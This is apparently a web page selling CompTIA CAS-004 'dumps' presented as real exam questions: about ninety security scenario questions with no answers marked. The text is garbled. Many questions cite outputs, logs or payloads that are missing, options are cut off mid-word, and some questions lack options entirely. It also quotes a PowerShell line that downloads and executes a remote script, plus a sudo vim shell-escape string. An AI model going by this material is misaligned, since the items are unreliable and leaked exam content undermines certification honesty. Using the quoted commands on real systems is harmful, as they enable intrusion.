Best CompTIA CAS-004 Dumps [2023] With Real Exam Questions

Jonnie Karnath2023-03-03T13:01:36+00:00

Do you want to ensure your success and pass the CAS-004 exam on your first attempt? One of the biggest advantages of using the CompTIA CAS-004 dumps is that it is updated regularly to ensure that it reflects the latest exam trends and requirements. This means that you can be sure that the CompTIA CAS-004 dumps you are studying are up-to-date and relevant to the exam you are preparing for. In addition to providing you with real exam questions and answers, the CompTIA CAS-004 dumps also include practice tests and quizzes that are designed to simulate the actual exam experience. This will help you get a feel for the exam format, as well as identify areas where you may need to focus your study efforts.

Page 1 of 11

1. A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

Deploy SOAR utilities and runbooks.

Replace the associated hardware.

Provide the contractors with direct access to satellite telemetry data.

Reduce link latency on the affected ground and satellite segments.

2. A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss.

Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

Segment the systems to reduce the attack surface if an attack occurs

Migrate the services to new systems with a supported and patched O

Patch the systems to the latest versions of the existing OSs

Install anti-malware. HIPS, and host-based firewalls on each of the systems

3. A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data.

Which of the following is the organization implementing?

Asynchronous keys

Homomorphic encryption

Data Lake

Machine learning

4. A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable.

Which of the following would BEST prevent this scenario from happening again?

Performing routine tabletop exercises

Implementing scheduled, full interruption tests

Backing up system log reviews

Performing department disaster recovery walk-throughs

5. A developer needs to implement PKI in an autonomous vehicle's software in the most efficient and labor-effective way possible.

Which of the following will the developer MOST likely implement?

Certificate chain

Root CA

Certificate pinning

CRL

OCSP

6. A security analyst is reviewing the following output:

Which of the following would BEST mitigate this type of attack?

Installing a network firewall

Placing a WAF inline

Implementing an IDS

Deploying a honeypot

7. A financial institution has several that currently employ the following controls:

* The severs follow a monthly patching cycle.

* All changes must go through a change management process.

* Developers and systems administrators must log into a jumpbox to access the servers hosting the data using two-factor authentication.

* The servers are on an isolated VLAN and cannot be directly accessed from the internal production network.

An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour.

Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?

Require more than one approver for all change management requests.

Implement file integrity monitoring with automated alerts on the servers.

Disable automatic patch update capabilities on the servers

Enhanced audit logging on the jump servers and ship the logs to the SIE

8. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective.

Which of the following risk mitigation techniques should the analyst use?

A. Update the incident response plan.

B. Blocklist the executable.

C. Deploy a honeypot onto the laptops.

D. Detonate in a sandbox.

9. A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.

Which of the following security responsibilities will the DevOps team need to perform?

Securely configure the authentication mechanisms

Patch the infrastructure at the operating system

Execute port scanning against the services

Upgrade the service as part of life-cycle management

10. Which of the following BEST sets expectation between the security team and business units within an organization?

Risk assessment

Memorandum of understanding

Business impact analysis

Business partnership agreement

Services level agreement

Page 2 of 11

11. A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.

Which of the following would BEST secure the company’s CI/CD pipeline?

Utilizing a trusted secrets manager

Performing DAST on a weekly basis

Introducing the use of container orchestration

Deploying instance tagging

12. A security solution uses a sandbox environment to execute zero-day software and collect indicators

of compromise.

Which of the following should the organization do to BEST take advantage of this solution?

Develop an Nmap plug-in to detect the indicator of compromise. n-and-response/what-is-vendor-agnostic-security-orchestration-automation-and-response-

Update the organization's group policy.

Include the signature in the vulnerability scanning tool.

Deliver an updated threat signature throughout the EDR system

13. An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems.

Which of the following is the MOST likely security consequence of this attack?

A turbine would overheat and cause physical harm.

The engineers would need to go to the historian.

The SCADA equipment could not be maintained.

Data would be exfiltrated through the data diodes.

14. A hospitality company experienced a data breach that included customer Pll. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service.

Which of the following is the BEST solution to help prevent this type of attack in the future?

NGFW for web traffic inspection and activity monitoring

CSPM for application configuration control

Targeted employee training and awareness exercises

CASB for OAuth application permission control

15. A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device.

Which of the following controls would reduce the discovery time for similar in the future.

Implementing application blacklisting

Configuring the mall to quarantine incoming attachment automatically

Deploying host-based firewalls and shipping the logs to the SIEM

Increasing the cadence for antivirus DAT updates to twice daily

16. An organization is designing a network architecture that must meet the following requirements:

Users will only be able to access predefined services.

Each user will have a unique allow list defined for access.

The system will construct one-to-one subject/object access paths dynamically.

Which of the following architectural designs should the organization use to meet these requirements?

Peer-to-peer secure communications enabled by mobile applications

Proxied application data connections enabled by API gateways

Microsegmentation enabled by software-defined networking

VLANs enabled by network infrastructure devices

17. A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access.

Which of the following risk techniques did the department use in this situation?

А. Accept

В. Avoid

C. Transfer

D. Mitigate

18. A software development company makes Its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website.

Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company?

Distribute the software via a third-party repository.

Close the web repository and deliver the software via email.

Email the software link to all customers.

Display the SHA checksum on the website.

19. A small company needs to reduce its operating costs. vendors have proposed solutions, which all focus on management of the company’s website and services. The Chief information Security Officer (CISO) insist all available resources in the proposal must be dedicated, but managing a private cloud is not an option.

Which of the following is the BEST solution for this company?

Community cloud service model

Multinency SaaS

Single-tenancy SaaS

On-premises cloud service model

20. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Antivirus and UEBA

Reverse proxy and sandbox

EDR and application approved list

Forward proxy and MFA

Page 3 of 11

21. During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.

Which of the following processes would BEST satisfy this requirement?

Monitor camera footage corresponding to a valid access request.

Require both security and management to open the door.

Require department managers to review denied-access requests.

Issue new entry badges on a weekly basis.

22. A Chief information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:

Which of the following MOST appropriate corrective action to document for this finding?

The product owner should perform a business impact assessment regarding the ability to implement a WA

The application developer should use a static code analysis tool to ensure any application code is not vulnerable to buffer overflows.

The system administrator should evaluate dependencies and perform upgrade as necessary.

The security operations center should develop a custom IDS rule to prevent attacks buffer overflows against this server.

23. A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability.

Which of the following would BEST resolve and mitigate the issue? (Select TWO).

Deploying a WAF signature

Fixing the PHP code

Changing the web server from HTTPS to HTTP

UsingSSLv3

Changing the code from PHP to ColdFusion

Updating the OpenSSL library

24. An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server.

Attempts to reproduce the error are confirmed, and clients are reporting the following: ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Which of the following is MOST likely the root cause?

The client application is testing PF

The client application is configured to use ECDH

The client application is configured to use RC4.

The client application is configured to use AES-256 in GC

25. A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.

Which of the following should the security team recommend FIRST?

Investigating a potential threat identified in logs related to the identity management system

Updating the identity management system to use discretionary access control

Beginning research on two-factor authentication to later introduce into the identity management system

Working with procurement and creating a requirements document to select a new IAM system/vendor

26. Which of the following testing plans is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions?

Disaster recovery checklist

Tabletop exercise

Full interruption test

Parallel test

27. A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC.

The following query behavior was captured:

Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

A) Personal health information: Inform the human resources department of the breach and review the DLP logs.

B) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.

C) Customer IDs: Inform the customer service department of the breach and work to change the account numbers.

D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

Option A

Option B

Option C

Option D

28. An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them.

Which of the following is the BEST design option to optimize security?

Limit access to the system using a jump box.

Place the new system and legacy system on separate VLANs

Deploy the legacy application on an air-gapped system.

Implement MFA to access the legacy system.

29. Ann, a CIRT member, is conducting incident response activities on a network that consists of several hundred virtual servers and thousands of endpoints and users. The network generates more than 10,000 log messages per second. The enterprise belong to a large, web-based cryptocurrency startup, Ann has distilled the relevant information into an easily digestible report for executive management . However, she still needs to collect evidence of the intrusion that caused the incident.

Which of the following should Ann use to gather the required information?

Traffic interceptor log analysis

Log reduction and visualization tools

Proof of work analysis

Ledger analysis software

30. A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.

Which of the following techniques would BEST support this?

Configuring systemd services to run automatically at startup

Creating a backdoor

Exploiting an arbitrary code execution exploit

Moving laterally to a more authoritative server/service

Page 4 of 11

31. Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

Lattice-based cryptography

Quantum computing

Asymmetric cryptography

Homomorphic encryption

32. A cybersecurity analyst discovered a private key that could have been exposed.

Which of the following is the BEST way for the analyst to determine if the key has been compromised?

HSTS

CRL

CSRs

OCSP

33. An analyst execute a vulnerability scan against an internet-facing DNS server and receives the following report:

Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?

Password cracker

Port scanner

Account enumerator

Exploitation framework

34. A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis.

A security engineer is concerned about the security of the solution and notes the following.

* The critical devise send cleartext logs to the aggregator.

* The log aggregator utilize full disk encryption.

* The log aggregator sends to the analysis server via port 80.

* MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely.

* The data is compressed and encrypted prior to being achieved in the cloud.

Which of the following should be the engineer’s GREATEST concern?

Hardware vulnerabilities introduced by the log aggregate server

Network bridging from a remote access VPN

Encryption of data in transit

Multinancy and data remnants in the cloud

35. A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.

Which of the following technologies would BEST meet this need?

Faraday cage

WPA2 PSK

WPA3 SAE

WEP 128 bit

36. A network administrator receives a ticket regarding an error from a remote worker who is trying to reboot a laptop. The laptop has not yet loaded the operating system, and the user is unable to continue the boot process. The administrator is able to provide the user with a recovery PIN, and the user is able to reboot the system and access the device as needed.

Which of the following is the MOST likely cause of the error?

Lockout of privileged access account

Duration of the BitLocker lockout period

Failure of the Kerberos time drift sync

Failure of TPM authentication

37. A company is preparing to deploy a global service.

Which of the following must the company do to ensure GDPR compliance? (Choose two.)

Inform users regarding what data is stored.

Provide opt-in/out for marketing messages.

Provide data deletion capabilities.

Provide optional data encryption.

Grant data access to third parties.

Provide alternative authentication techniques.

38. An organization is looking to establish more robust security measures by implementing PKI.

Which of the following should the security analyst implement when considering mutual authentication?

A. Perfect forward secrecy on both endpoints

B. Shared secret for both endpoints

C. Public keys on both endpoints

D. A common public key on each endpoint

E. A common private key on each endpoint

39. A company was recently infected by malware. During the root cause analysis. the company determined that several users were installing their own applications. TO prevent further compromises, the company has decided it will only allow authorized applications to run on its systems.

Which Of the following should the company implement?

Signing

Access control

HIPS

Permit listing

40. A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:

As part of the image process, which of the following is the FIRST step the analyst should take?

Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts

Validate the final "Received" header against the DNS entry of the domain.

Compare the 'Return-Path" and "Received" fields.

Ignore the emails, as SPF validation is successful, and it is a false positive

Page 5 of 11

41. A software development company is building a new mobile application for its social media platform. The company wants to gain its Users' rust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust.

To support users’ trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

* Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Quick UDP internet connection

OCSP stapling

Private CA

DNSSEC

CRL

HSTS

Distributed object model

42. A company has moved its sensitive workloads lo the cloud and needs to ensure high availability and resiliency of its web-based application.

The cloud architecture team was given the following requirements

• The application must run at 70% capacity at all times

• The application must sustain DoS and DDoS attacks.

• Services must recover automatically.

Which of the following should the cloud architecture team implement? (Select THREE).

Read-only replicas

BCP

Autoscaling

WAF

CDN

Encryption

Continuous snapshots

Containenzation

43. A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.

Which of the following should the security administrator do to mitigate the risk?

Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.

Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.

Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash.

Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

44. A security analyst runs a vulnerability scan on a network administrator's workstation. The network administrator has direct administrative access to the company's SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user's browser, OS, email client, and an offline password manager.

Which of the following should the security analyst patch FIRST?

Email client

Password manager

Browser

45. A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead.

The network comprises three VLANs:

The security engineer looks at the UTM firewall rules and finds the following:

Which of the following should the security engineer do to ensure IMAPS functions properly on the corporate user network?

Contact the email service provider and ask if the company IP is blocked.

Confirm the email server certificate is installed on the corporate computers.

Make sure the UTM certificate is imported on the corporate computers.

Create an IMAPS firewall rule to ensure email is allowed.

46. A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.

The best option for the auditor to use NEXT is:

A SCAP assessment.

Reverse engineering

Fuzzing

Network interception.

47. The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints.

Which of the following would BEST meet the requirement?

A. An open-source automation server

B. A static code analyzer

C. Trusted open-source libraries

D. A single code repository for all developers

48. A security engineer is reviewing a record of events after a recent data breach incident that Involved the following:

• A hacker conducted reconnaissance and developed a footprint of the company s Internet-facing web application assets.

• A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account.

• The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

Dynamic analysis

Secure web gateway

Software composition analysis

User behavior analysis

Stateful firewall

49. An administrator at a software development company would like to protect the integrity Of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA.

Which of the following is MOST likely the cause of the signature failing?

The NTP server is set incorrectly for the developers.

The CA has included the certificate in its CRL_

The certificate is set for the wrong key usage.

Each application is missing a SAN or wildcard entry on the certificate.

50. A systems administrator at a web-hosting provider has been tasked with renewing the public certificates of all customer sites.

Which of the following would BEST support multiple domain names while minimizing the amount of certificates needed?

ocsp

CRL

SAN

Page 6 of 11

51. A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.

Which of the following would be BEST for the developer to perform? (Choose two.)

Utilize code signing by a trusted third party.

Implement certificate-based authentication.

Verify MD5 hashes.

Compress the program with a password.

Encrypt with 3DE

Make the DACL read-only.

52. The Chief Information Security Officer (CISO) is working with a new company and needs a legal “document to ensure all parties understand their roles during an assessment.

Which of the following should the CISO have each party sign?

SLA

ISA

Permissions and access

Rules of engagement

53. A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private.

Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

MD5-based envelope method

HMAC SHA256

PBKDF2

PGP

54. Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?

Determine the optimal placement of hot/warm sites within the enterprise architecture.

Create new processes for identified gaps in continuity planning.

Establish new staff roles and responsibilities for continuity of operations.

Assess the effectiveness of documented processes against a realistic scenario.

55. A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.

Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application?

The company will have access to the latest version to continue development.

The company will be able to force the third-party developer to continue support.

The company will be able to manage the third-party developer’s development process.

The company will be paid by the third-party developer to hire a new development team.

56. CORRECT TEXT

SIMULATION

You are a security analyst tasked with interpreting an Nmap scan output from company’s privileged network.

The company’s hardening guidelines indicate the following:

There should be one primary server or service per device.

Only default ports should be used.

Non-secure protocols should be disabled.

INSTRUCTIONS

Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed.

For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information:

The IP address of the device

The primary server or service of the device (Note that each IP should by associated with one service/port only)

The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple ports may need to be closed to comply with the hardening guidelines)

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

57. Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing tramc via Wire-shark. The security architect finds that the issue is the time required to validate the certificate.

Which of the following solutions should the security architect recommend?

Adding more nodes to the web server clusters

Changing the cipher algorithm used on the web server

Implementing OCSP stapling on the server

Upgrading to TLS 1.3

58. An enterprise is undergoing an audit to review change management activities when promoting code to production. The audit reveals the following:

• Some developers can directly publish code to the production environment.

• Static code reviews are performed adequately.

• Vulnerability scanning occurs on a regularly scheduled basis per policy.

Which of the following should be noted as a recommendation within the audit report?

Implement short maintenance windows.

Perform periodic account reviews.

Implement job rotation.

Improve separation of duties.

59. A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.

Which of the following would BEST safeguard the APIs? (Choose two.)

Bot protection

OAuth 2.0

Input validation

Autoscaling endpoints

Rate limiting

CSRF protection

60. A security analyst discovered that the company’s WAF was not properly configured.

The main web server was breached, and the following payload was found in one of the malicious requests:

Which of the following would BEST mitigate this vulnerability?

CAPTCHA

Input validation

Data encoding

Network intrusion prevention

Page 7 of 11

61. A healthcare system recently suffered from a ransomware incident As a result the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits and had open RDP access to servers with personal health information.

As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Select THREE).

SD-WAN

PAM

Remote access VPN

MFA

Network segmentation

BGP

NAC

62. A municipal department receives telemetry data from a third-party provider The server collecting telemetry sits in the municipal departments screened network and accepts connections from the third party over HTTPS. The daemon has a code execution vulnerability from a lack of input sanitization of out-of-bound messages, and therefore, the cybersecurity engineers would like to Implement nsk mitigations.

Which of the following actions, if combined, would BEST prevent exploitation of this vulnerability? (Select TWO).

Implementing a TLS inspection proxy on-path to enable monitoring and policy enforcement

Creating a Linux namespace on the telemetry server and adding to it the servicing HTTP daemon

Installing and configuring filesystem integrity monitoring service on the telemetry server

Implementing an EDR and alert on Identified privilege escalation attempts to the SIEM

Subscribing to a UTM service that enforces privacy controls between the internal network and the screened subnet

Using the published data schema to monitor and block off nominal telemetry messages

63. A company that all mobile devices be encrypted, commensurate with the full disk encryption scheme of assets, such as workstation, servers, and laptops.

Which of the following will MOST likely be a limiting factor when selecting mobile device managers for the company?

Increased network latency

Unavailable of key escrow

Inability to selected AES-256 encryption

Removal of user authentication requirements

64. An organization established an agreement with a partner company for specialized help desk services. A senior security officer within the organization Is tasked with providing documentation required to set up a dedicated VPN between the two entities.

Which of the following should be required?

SLA

ISA

NDA

MOU

65. A security architect is designing a solution for a new customer who requires significant security capabilities in its environment.

The customer has provided the architect with the following set of requirements:

* Capable of early detection of advanced persistent threats.

* Must be transparent to users and cause no performance degradation.

+ Allow integration with production and development networks seamlessly.

+ Enable the security team to hunt and investigate live exploitation techniques.

Which of the following technologies BEST meets the customer's requirements for security capabilities?

Threat Intelligence

Deception software

Centralized logging

Sandbox detonation

66. A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.

Which of the following techniques will MOST likely meet the business’s needs?

Performing deep-packet inspection of all digital audio files

Adding identifying filesystem metadata to the digital audio files

Implementing steganography

Purchasing and installing a DRM suite

67. A security analyst is trying to identify the source of a recent data loss incident. The analyst has reviewed all the for the time surrounding the identified all the assets on the network at the time of the data loss. The analyst suspects the key to finding the source was obfuscated in an application.

Which of the following tools should the analyst use NEXT?

Software Decomplier

Network enurrerator

Log reduction and analysis tool

Static code analysis

68. A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.

Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

NAC to control authorized endpoints

FIM on the servers storing the data

A jump box in the screened subnet

A general VPN solution to the primary network

69. A security engineer needs to recommend a solution that will meet the following requirements:

Identify sensitive data in the provider’s network

Maintain compliance with company and regulatory guidelines

Detect and respond to insider threats, privileged user threats, and compromised accounts Enforce datacentric security, such as encryption, tokenization, and access control

Which of the following solutions should the security engineer recommend to address these requirements?

WAF

CASB

SWG

DLP

70. A security is assisting the marketing department with ensuring the security of the organization’s social media platforms.

The two main concerns are:

The Chief marketing officer (CMO) email is being used department wide as the username The password has been shared within the department

Which of the following controls would be BEST for the analyst to recommend?

Configure MFA for all users to decrease their reliance on other authentication.

Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.

Create multiple social media accounts for all marketing user to separate their actions.

Ensue the password being shared is sufficiently and not written down anywhere.

Page 8 of 11

71. An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications.

The security team has concerns about the following:

Unstructured data being exfiltrated after an employee leaves the organization

Data being exfiltrated as a result of compromised credentials

Sensitive information in emails being exfiltrated

Which of the following solutions should the security team implement to mitigate the risk of data loss?

Mobile device management, remote wipe, and data loss detection

Conditional access, DoH, and full disk encryption

Mobile application management, MFA, and DRM

Certificates, DLP, and geofencing

72. An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes.

These devices should:

* Be based on open-source Android for user familiarity and ease.

* Provide a single application for inventory management of physical assets.

* Permit use of the camera be only the inventory application for the purposes of scanning

* Disallow any and all configuration baseline modifications.

* Restrict all access to any device resource other than those requirement?

Set an application wrapping policy, wrap the application, distributes the inventory APK via the MAM tool, and test the application restrictions.

Write a MAC sepolicy that defines domains with rules, label the inventory application, build the policy, and set to enforcing mode.

Swap out Android Linux kernel version for >2,4,0, but the internet build Android, remove unnecessary functions via MDL, configure to block network access, and perform integration testing

Build and install an Android middleware policy with requirements added, copy the file into/ user/init, and then built the inventory application.

73. A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that

the traffic is occurring on a non-standard port (TCP 40322).

Which of the following commands should the security engineer use FIRST to find the malicious process?

tcpdump

netstar

tasklist

traceroute

ipconfig

74. A small company recently developed prototype technology for a military program. The company’s security engineer is concerned about potential theft of the newly developed, proprietary information.

Which of the following should the security engineer do to BEST manage the threats proactively?

Join an information-sharing community that is relevant to the company.

Leverage the MITRE ATT&CK framework to map the TT

Use OSINT techniques to evaluate and analyze the threats.

Update security awareness training to address new threats, such as best practices for data security.

75. During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels.

Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?

Spawn a shell using sudo and an escape string such as sudo vim -c ‘!sh’.

Perform ASIC password cracking on the host.

Read the /etc/passwd file to extract the usernames.

Initiate unquoted service path exploits.

Use the UNION operator to extract the database schema.

76. A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.

The technician will define this threat as:

a decrypting RSA using obsolete and weakened encryption attack.

a zero-day attack.

an advanced persistent threat.

an on-path attack.

77. The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices.

Which of the following should the CIO implement to achieve this goal?

BYOO

CYOD

COPE

MDM

78. A security analyst is reading the results of a successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the exploit is detailed using logs and outputs from the test However, the attack vector of the exploit is missing, making it harder to recommend remediation’s.

Given the following output:

The penetration testers MOST likely took advantage of:

A TOC/TOU vulnerability

A plain-text password disclosure

An integer overflow vulnerability

A buffer overflow vulnerability

79. All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools.

The human resources department wants to use these tools to process sensitive information but is concerned the data could be:

Leaked to the media via printing of the documents

Sent to a personal email address

Accessed and viewed by systems administrators

Uploaded to a file storage site

Which of the following would mitigate the department’s concerns?

Data loss detection, reverse proxy, EDR, and PGP

VDI, proxy, CASB, and DRM

Watermarking, forward proxy, DLP, and MFA

Proxy, secure VPN, endpoint encryption, and AV

80. Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application.

Which of the following MOST likely needs to be done to avoid this in the future?

Modify the ACLs.

Review the Active Directory.

Update the marketing department's browser.

Reconfigure the WA

Page 9 of 11

81. A company’s employees are not permitted to access company systems while traveling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email traveling.

Which of the following is the MOST likely explanation? (Select TWO.)

Outdated escalation attack

Privilege escalation attack

VPN on the mobile device

Unrestricted email administrator accounts

Chief use of UDP protocols

Disabled GPS on mobile devices

82. The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:

* Transaction being requested by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to malware and ransomeware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing.

Which of the following is the BEST option to resolve the boar’s concerns for this email migration?

Data loss prevention

Endpoint detection response

SSL VPN

Application whitelisting

83. A vulnerability analyst identified a zero-day vulnerability in a company’s internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.

Which of the following would be BEST suited to meet these requirements?

ARF

ISACs

Node.js

OVAL

84. An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft.

Which of the following can be used to mitigate this risk?

An additional layer of encryption

A third-party data integrity monitoring solution

A complete backup that is created before moving the data

Additional application firewall rules specific to the migration

85. Which of the following indicates when a company might not be viable after a disaster?

Maximum tolerable downtime

Recovery time objective

Mean time to recovery

Annual loss expectancy

86. A security analyst is validating the MAC policy on a set of Android devices. The policy was written to

ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:

Despite the deny message, this action was still permit following is the MOST likely fix for this issue?

Add the objects of concern to the default context.

Set the devices to enforcing

Create separate domain and context files for irc.

Rebuild the policy, reinstall, and test.

87. Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Select TWO).

proxy

Tunneling

VDI

MDM

RDP

MAC address randomization

88. Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?

Key escrow

TPM

Trust models

Code signing

89. Given the following log snippet from a web server:

Which of the following BEST describes this type of attack?

SQL injection

Cross-site scripting

Brute-force

Cross-site request forgery

90. A security administrator configured the account policies per security implementation guidelines.

However, the accounts still appear to be susceptible to brute-force attacks.

The following settings meet the existing compliance guidelines:

Must have a minimum of 15 characters

Must use one number

Must use one capital letter

Must not be one of the last 12 passwords used

Which of the following policies should be added to provide additional security?

Shared accounts

Password complexity

Account lockout

Password history

Time-based logins

Page 10 of 11

91. A threat analyst notices the following URL while going through the HTTP logs.

Which of the following attack types is the threat analyst seeing?

SQL injection

CSRF

Session hijacking

XSS

92. A Chief Information Security Officer (CISO) is concerned that a company's current data disposal procedures could result in data remanence. The company uses only SSDs.

